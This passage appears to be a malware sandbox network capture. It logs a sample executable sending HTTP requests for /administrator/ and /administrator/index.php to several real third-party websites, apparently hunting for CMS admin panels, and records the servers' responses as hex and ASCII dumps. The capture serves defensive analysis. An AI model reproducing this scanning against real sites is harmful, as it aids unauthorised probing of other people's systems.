                                                                                                                                                                                                    Data Ascii: y8hoc0bLJCSCJTgKORTDkd7gM0NBHA9Q/ud3f8swf5xMwh4KOweex3iCzjJ2UTipJW0qF0Xp9vq9vgk4sv6MONpvSpvUBopqw975WUOdaEvTl8QzUf+rZNrAJnlDaJedxPUKndwo+27w8JkVJfrV4eoMp8PTxxBDjkykoHz71y8z9u/Dtf/t0ElrGUX4tkvkUVFe7mepqPCBdL3+qhOqbFNuEE3j6IHhq5Uj5Uk85zMHnoFj/di


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    40192.168.2.455274172.96.186.206806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.510325909 CET227OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029428959 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.2.34
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    link: <https://samson.pe/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                    content-encoding: gzip
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 32 32 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 5b 77 db 38 92 f0 b3 7d ce fc 07 84 39 b1 a5 6e de 25 f9 22 5b ea 71 d2 9e de ec a6 3b 99 38 d9 39 bb 49 4e 0e 44 42 12 12 92 60 03 a0 65 b5 5b 3f 66 1f f7 79 df f6 b5 ff d8 9e 02 78 13 4d c9 8e ed 9e ef cb 4c cb 24 50 a8 2a 14 aa 0a f7 e2 e9 93 90 05 72 99 12 34 97 71 34 de 3d 85 3f 28 c2 c9 6c 64 10 61 bd 39 37 20 8d e0 70 bc bb 73 1a 13 89 51 30 c7 5c 10 39 32 de bf fb 9b 75 64 94 e9 09 8e c9 c8 b8 a4 64 91 32 2e 0d 14 b0 44 92 44 8e 8c 05 0d e5 7c 14 92 4b 1a 10 4b bd 98 88 26 54 52 1c 59 22 c0 11 19 79 0a 4b 44 93 af 88 93 68 64 a4 9c 4d 69 44 0c 34 e7 64 3a 32 e6 52 a6 62 e8 38 b3 38 9d d9 8c cf 9c ab 69 e2 78 50 a8 e0 49 d1 de e7 6c c2 a4 d8 2f 29 ef 27 8c 26 21 b9 32 d1 94 45 11 5b ec 23 47 15 79 62 59 e8 dd 9c 0a 24 a8 24 88 0a c4 52 49 63 fa 1b 09 d1 82 ca 39 92 73 82 fe 83 61 21 d1 c5 f9 6b 94 46 d9 8c 26 e8 d2 f7 ec 01 b2 50 c1 cc 12 00 ec 80 c5 ce 82 f1 30 e5 44 08 47 83 0a 47 10 e6 20 cb 02 d1 48 2a 23 32 7e f3 c7 7f cd 68 82 51 c2 10 49 40 30 1c 87 18 59 e8 02 c7 82 25 e8 05 a4 b0 48 a0 37 84 ff f1 bf a7 8e 2e 54 54 2e e5 2c 25 5c 2e 47 06 9b 0d 23 06 12 ab 49 97 88 cf e7 17 06 d4 2c 6f 9f 35 70 85 a9 06 fd 4d 8c 6c c4 0a 72 fb 0c 32 af 61 6e ad 4a 8e 41 04 9c a6 12 81 9a 8d 0c 9c a6 11 0d b0 a4 2c 71 a2 f0 fb 2f 82 25 06 0a 22 2c c4 c8 50 42 b5 44 30 27 31 b6 66 1c a7 73 63 7c 6d fc 55 a9 d2 95 34 86 a5 2a 68 10 50 06 c3 34 fe aa 21 87 1f ae 8d bf 02 0d 63 68 fc 83 4c 2e a8 24 90 49 c3 7a 39 25 70 3b 25 ce d3 05 99 40 3d 0c d3 c8 78 d4 0a 62 98 86 aa e4 d0 68 af 9c 69 84 44 57 8d b2 c4 18 1a 86 69 a4 d9 24 a2 62 4e b8 31 bc de 4c 9a f1 19 4e e8 6f 4a 06 c6 ca 34 52 06 96 42 71 74 16 80 58 8c 7a 4d 2e 08 e6 c1 3c cf 30 0d 89 f9 8c 48 85 3d af ea 79 22 f9 f2 0d a3 89 d4 55 79 47 e2 34 c2 12 a4 50 e8 aa 28 6b fd 83 18 5d 0b 85 f1 b3 24 3c fe 2c 24 a7 c9 6c 05 4c fc 9a 11 be b4 68 92 66 20 68 4e 7e cd 28 27 21 52 a6 75 b3 88 b1 fa 64 1a 34 79 85 93 59 86 67 40 4c 7b 8b 95 59 35 c2 eb 7a 35 b7 b4 c4 9a 38 6e 95 f9 96 d6 8a d8 8c d5 45 f3 32 c6 33 f2 7a f2 85 04 20 9b 16 6e b7 30 e5 68 15 73 00 a7 43 01 91 b3 45 55 16 a9 95 fb 3b 27 4b 23 86 43 e1 f8 ae ef 3b ee 81 42 60 15 2d 90 80 be e6 90 ef 37 a8 dd 37 e1 52 fe d4 18 1e bb a6 31 27 74 36 97 fa 39 c0 a9 d6 a4 0d aa bb 32 0d 55 a7 ad 6a da 26 82 95 69 08 1c 93 33 61 0c 3f 94 fa b5 58 2c ec 25 cb 64 36 21 ca 23 66 82 70 e7 e2 ec e7 8b d7 bf fc f4 f6 f5 fb 37 c6 a7 d5 a7 d5 a9 a3 6d 05 1c 15 78 60 e7 86 8f b5 95 cf dc dd 3d 2d 7b 82 fd 30 11 56 ca c9 94 c8 60 be af bb 83 7d c7 01 7a 33 c6 66 11 91
                                                                                                                                                                                                    Data Ascii: 22c2}[w8}9n%"[q;89INDB`e[?fyxML$P*r4q4=?(lda97 psQ0\92udd2.DD|KK&TRY"yKDhdMiD4d:2Rb88ixPIl/)'&!2E[#GybY$$RIc9sa!kF&P0DGG H*#2~hQI@0Y%H7.TT.,%\.G#I,o5pMlr2anJA,q/%",PBD0'1fsc|mU4*hP4!chL.$Iz9%p;%@=xbhiDWi$bN1LNoJ4RBqtXzM.<0H=y"UyG4P(k]$<,$lLhf hN~('!Rud4yYg@L{Y5z58nE23z n0hsCEU;'K#C;B`-77R1't692Uj&i3a?X,%d6!#fp7mx`=-{0V`}z3f
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029551029 CET1340INData Raw: 78 16 e3 04 cf 08 07 c2 ca c1 df 5a 7a ca 12 29 f2 f2 38 a5 a2 a5 a4 81 23 49 78 02 56 d4 e2 b5 b8 10 df 5f c5 91 81 94 77 1d b5 8b 18 ed 71 fc 6b c6 4e d0 df 08 09 9b 3d 59 a1 0e c4 99 12 12 3a ca 4d 56 7c 3f 36 75 14 12 14 b0 98 24 12 73 ca c4
                                                                                                                                                                                                    Data Ascii: xZz)8#IxV_wqkN=Y:MV|?6u$sffs%|u1uCO>IEJb^)i2h?jqQ?:^vms_T)lrvKL20%',R&AD|t
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029563904 CET1340INData Raw: ba a6 ec 80 5d d7 9a 10 40 a7 1d 61 66 66 da ed ae 74 b6 2d e7 24 59 33 8a 29 e3 1d 65 fb 88 26 88 74 2b 83 fb 20 3f 8d c8 07 59 b7 41 dd 65 2b 13 1c 55 80 b5 d4 bd bd 2a 19 8a 6a 73 7e 32 1a 49 50 dd 42 d7 44 ad 44 65 bc ed 18 ab fc 06 ee ee c9
                                                                                                                                                                                                    Data Ascii: ]@afft-$Y3)e&t+ ?YAe+U*js~2IPBDDe=aQ?r3E|{]tWnC8%MNhkvHFzk$aywH|GlP~tophJvWs3dAV0ih}4Ay5}=rCpH-=WIt_V
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029575109 CET1340INData Raw: df aa 46 31 0d 13 70 87 db 69 98 3d d3 f3 8f 4b fc 7d d7 f4 bc 03 d3 1f 6c 68 bd 72 98 62 59 22 c6 51 34 44 5e 2f bd 6a f8 e3 1a 10 8c ae c1 f8 7c 77 1b 54 04 5b e0 43 d4 3b d8 06 74 65 e5 60 7d ff 06 98 48 71 40 93 99 65 f9 ee 10 b9 76 bf cf 49
                                                                                                                                                                                                    Data Ascii: F1pi=K}lhrbY"Q4D^/j|wT[C;te`}Hq@evI`)- }w-[ !m;D=w;D=hQCJ8 RWHu~sKIX3p[J7sr[Y&Vk5\S;{.Ma^p
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029587984 CET1340INData Raw: b4 54 9c fc e0 28 9c 80 2d 31 95 e7 2f d5 fd c4 87 30 a7 7c 02 5e 10 c1 e2 fc fc f3 ed 67 45 37 f2 57 47 f6 78 2c e6 da 01 f7 78 08 7f b0 0c 35 9a c7 e3 4e 9d e4 4d f0 e5 83 19 2b 10 3d 1e 6b 31 9e 25 74 4a 03 2b 65 69 f6 70 ed 5b 47 f7 78 6c b2
                                                                                                                                                                                                    Data Ascii: T(-1/0|^gE7WGx,x5NM+=k1%tJ+eip[GxlEd'x\yEdE}X9$SE|*pU0>%^Gkd{:Imonrk0?_DCsm?lIplfC1:>pMYV'v>(#
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029601097 CET1340INData Raw: 76 10 5e ec 15 5e 12 8e 46 28 0f 17 51 25 fd fe 3b fa f0 a9 8a ce 06 9c 75 ba d7 65 be 9d 66 62 de c1 7c a6 c2 4d 88 ee c9 6a 57 81 ec 0b 22 f7 4d b4 0f b3 24 c2 f7 4d 74 6d 84 0c 86 a4 2a b8 62 d9 cf 1a 9f 56 a8 7b a2 8b 18 5f 84 61 22 08 be 02
                                                                                                                                                                                                    Data Ascii: v^^F(Q%;uefb|MjW"M$Mtm*bV{_a"A:2]i% \g0)ALp%LScV-^!L$DCx`Tt6/\UkC*}1\uF5+VR<`<|
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029613018 CET1340INData Raw: c2 b9 c4 d1 65 16 61 01 4c 43 df c7 59 64 41 1c 9f 90 59 09 0e b1 63 8c df 14 b0 db f8 ef f5 1e 93 fd 5e 6f 2b f7 7a 9d 9d 2a 15 b9 50 3b 57 94 89 6d dc 41 4f 55 b3 44 b5 35 54 b3 93 6f b4 b2 e3 ed b2 55 23 88 40 32 c7 18 43 c4 5e 1c c8 ed 06 e6
                                                                                                                                                                                                    Data Ascii: eaLCYdAYc^o+z*P;WmAOUD5ToU#@2C^$b5soszv++8$!R<dXw?AMG.M!_ve5,=wvVWnNfVE0;Hog-+#!Q2&)DTtT3dQ#;;f
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.029623985 CET392INData Raw: 4b c4 2d 4b f2 f5 02 ad 5f 17 45 6a 7c bd 93 4f 89 f4 27 13 d7 27 18 24 35 c6 e8 77 94 cf 24 e0 f8 45 01 5c fc ad 13 29 9e 0b f9 14 ef c5 df b6 f4 66 5a f1 0e ac 01 0d 98 09 c0 18 7c 5c 1b ae c3 28 5b c3 21 f5 a8 76 8c 61 28 be af ce 06 e9 b1 67
                                                                                                                                                                                                    Data Ascii: K-K_Ej|O''$5w$E\)fZ|\([!va(gb/I]P3`lvoxZ$P~#<lD:+v_4%8zoNg4Lm\]bZ]zC[qT^NMOLM=}|,O'q+q2Hzdc&>z5YJ\)
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.033396006 CET69INData Raw: 61 0d 0a 03 00 d0 52 74 95 31 7e 00 00 0d 0a
                                                                                                                                                                                                    Data Ascii: aRt1~
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.033432007 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.035351038 CET278OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://samson.pe/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.467067003 CET447INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.2.34
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    x-redirect-by: WordPress
                                                                                                                                                                                                    location: http://samson.pe/administrator/
                                                                                                                                                                                                    content-length: 0
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:31 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.467637062 CET269OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://samson.pe/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.245187044 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                    x-powered-by: PHP/7.2.34
                                                                                                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                                                                                                    link: <https://samson.pe/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                    transfer-encoding: chunked
                                                                                                                                                                                                    content-encoding: gzip
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                                    Data Raw: 32 32 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 5b 77 db 38 92 f0 b3 7d ce fc 07 84 39 b1 a5 6e de 25 f9 22 5b ea 71 d2 9e de ec a6 3b 99 38 d9 39 bb 49 4e 0e 44 42 12 12 92 60 03 a0 65 b5 5b 3f 66 1f f7 79 df f6 b5 ff d8 9e 02 78 13 4d c9 8e ed 9e ef cb 4c cb 24 50 a8 2a 14 aa 0a f7 e2 e9 93 90 05 72 99 12 34 97 71 34 de 3d 85 3f 28 c2 c9 6c 64 10 61 bd 39 37 20 8d e0 70 bc bb 73 1a 13 89 51 30 c7 5c 10 39 32 de bf fb 9b 75 64 94 e9 09 8e c9 c8 b8 a4 64 91 32 2e 0d 14 b0 44 92 44 8e 8c 05 0d e5 7c 14 92 4b 1a 10 4b bd 98 88 26 54 52 1c 59 22 c0 11 19 79 0a 4b 44 93 af 88 93 68 64 a4 9c 4d 69 44 0c 34 e7 64 3a 32 e6 52 a6 62 e8 38 b3 38 9d d9 8c cf 9c ab 69 e2 78 50 a8 e0 49 d1 de e7 6c c2 a4 d8 2f 29 ef 27 8c 26 21 b9 32 d1 94 45 11 5b ec 23 47 15 79 62 59 e8 dd 9c 0a 24 a8 24 88 0a c4 52 49 63 fa 1b 09 d1 82 ca 39 92 73 82 fe 83 61 21 d1 c5 f9 6b 94 46 d9 8c 26 e8 d2 f7 ec 01 b2 50 c1 cc 12 00 ec 80 c5 ce 82 f1 30 e5 44 08 47 83 0a 47 10 e6 20 cb 02 d1 48 2a 23 32 7e f3 c7 7f cd 68 82 51 c2 10 49 40 30 1c 87 18 59 e8 02 c7 82 25 e8 05 a4 b0 48 a0 37 84 ff f1 bf a7 8e 2e 54 54 2e e5 2c 25 5c 2e 47 06 9b 0d 23 06 12 ab 49 97 88 cf e7 17 06 d4 2c 6f 9f 35 70 85 a9 06 fd 4d 8c 6c c4 0a 72 fb 0c 32 af 61 6e ad 4a 8e 41 04 9c a6 12 81 9a 8d 0c 9c a6 11 0d b0 a4 2c 71 a2 f0 fb 2f 82 25 06 0a 22 2c c4 c8 50 42 b5 44 30 27 31 b6 66 1c a7 73 63 7c 6d fc 55 a9 d2 95 34 86 a5 2a 68 10 50 06 c3 34 fe aa 21 87 1f ae 8d bf 02 0d 63 68 fc 83 4c 2e a8 24 90 49 c3 7a 39 25 70 3b 25 ce d3 05 99 40 3d 0c d3 c8 78 d4 0a 62 98 86 aa e4 d0 68 af 9c 69 84 44 57 8d b2 c4 18 1a 86 69 a4 d9 24 a2 62 4e b8 31 bc de 4c 9a f1 19 4e e8 6f 4a 06 c6 ca 34 52 06 96 42 71 74 16 80 58 8c 7a 4d 2e 08 e6 c1 3c cf 30 0d 89 f9 8c 48 85 3d af ea 79 22 f9 f2 0d a3 89 d4 55 79 47 e2 34 c2 12 a4 50 e8 aa 28 6b fd 83 18 5d 0b 85 f1 b3 24 3c fe 2c 24 a7 c9 6c 05 4c fc 9a 11 be b4 68 92 66 20 68 4e 7e cd 28 27 21 52 a6 75 b3 88 b1 fa 64 1a 34 79 85 93 59 86 67 40 4c 7b 8b 95 59 35 c2 eb 7a 35 b7 b4 c4 9a 38 6e 95 f9 96 d6 8a d8 8c d5 45 f3 32 c6 33 f2 7a f2 85 04 20 9b 16 6e b7 30 e5 68 15 73 00 a7 43 01 91 b3 45 55 16 a9 95 fb 3b 27 4b 23 86 43 e1 f8 ae ef 3b ee 81 42 60 15 2d 90 80 be e6 90 ef 37 a8 dd 37 e1 52 fe d4 18 1e bb a6 31 27 74 36 97 fa 39 c0 a9 d6 a4 0d aa bb 32 0d 55 a7 ad 6a da 26 82 95 69 08 1c 93 33 61 0c 3f 94 fa b5 58 2c ec 25 cb 64 36 21 ca 23 66 82 70 e7 e2 ec e7 8b d7 bf fc f4 f6 f5 fb 37 c6 a7 d5 a7 d5 a9 a3 6d 05 1c 15 78 60 e7 86 8f b5 95 cf dc dd 3d 2d 7b 82 fd 30 11 56 ca c9 94 c8 60 be af bb 83 7d c7 01 7a 33 c6 66 11 91
                                                                                                                                                                                                    Data Ascii: 22c2}[w8}9n%"[q;89INDB`e[?fyxML$P*r4q4=?(lda97 psQ0\92udd2.DD|KK&TRY"yKDhdMiD4d:2Rb88ixPIl/)'&!2E[#GybY$$RIc9sa!kF&P0DGG H*#2~hQI@0Y%H7.TT.,%\.G#I,o5pMlr2anJA,q/%",PBD0'1fsc|mU4*hP4!chL.$Iz9%p;%@=xbhiDWi$bN1LNoJ4RBqtXzM.<0H=y"UyG4P(k]$<,$lLhf hN~('!Rud4yYg@L{Y5z58nE23z n0hsCEU;'K#C;B`-77R1't692Uj&i3a?X,%d6!#fp7mx`=-{0V`}z3f
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.245201111 CET1340INData Raw: 78 16 e3 04 cf 08 07 c2 ca c1 df 5a 7a ca 12 29 f2 f2 38 a5 a2 a5 a4 81 23 49 78 02 56 d4 e2 b5 b8 10 df 5f c5 91 81 94 77 1d b5 8b 18 ed 71 fc 6b c6 4e d0 df 08 09 9b 3d 59 a1 0e c4 99 12 12 3a ca 4d 56 7c 3f 36 75 14 12 14 b0 98 24 12 73 ca c4
                                                                                                                                                                                                    Data Ascii: xZz)8#IxV_wqkN=Y:MV|?6u$sffs%|u1uCO>IEJb^)i2h?jqQ?:^vms_T)lrvKL20%',R&AD|t


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    41192.168.2.455302192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.838399887 CET240OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: prettypollycleaning.ae
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.949673891 CET523INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: http://www.prettypollycleaning.ae/administrator/
                                                                                                                                                                                                    Content-Length: 256
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 65 74 74 79 70 6f 6c 6c 79 63 6c 65 61 6e 69 6e 67 2e 61 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.prettypollycleaning.ae/administrator/">here</a>.</p></body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.434088945 CET308OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: prettypollycleaning.ae
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://www.prettypollycleaning.ae/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.545286894 CET541INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: http://www.prettypollycleaning.ae/administrator/index.php
                                                                                                                                                                                                    Content-Length: 265
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 72 65 74 74 79 70 6f 6c 6c 79 63 6c 65 61 6e 69 6e 67 2e 61 65 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.prettypollycleaning.ae/administrator/index.php">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    42192.168.2.45533152.206.191.232806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.848351002 CET231OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.946676016 CET538INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 174
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                    Location: http://www.perrisesd.org/administrator/
                                                                                                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                                                                                                    X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 3c 62 72 2f 3e 70 65 72 72 69 73 65 73 64 2e 6f 72 67
                                                                                                                                                                                                    Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.perrisesd.org/administrator/">here</a>.</h2></body></html><br/>perrisesd.org


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    43192.168.2.45533215.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.848428965 CET237OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: svenssonfriends.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.946389914 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:30 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-123-165.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 81a04949-9058-4c59-ab6f-5d3f787a9479
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:30.946558952 CET298OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: svenssonfriends.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://svenssonfriends.com/administrator/
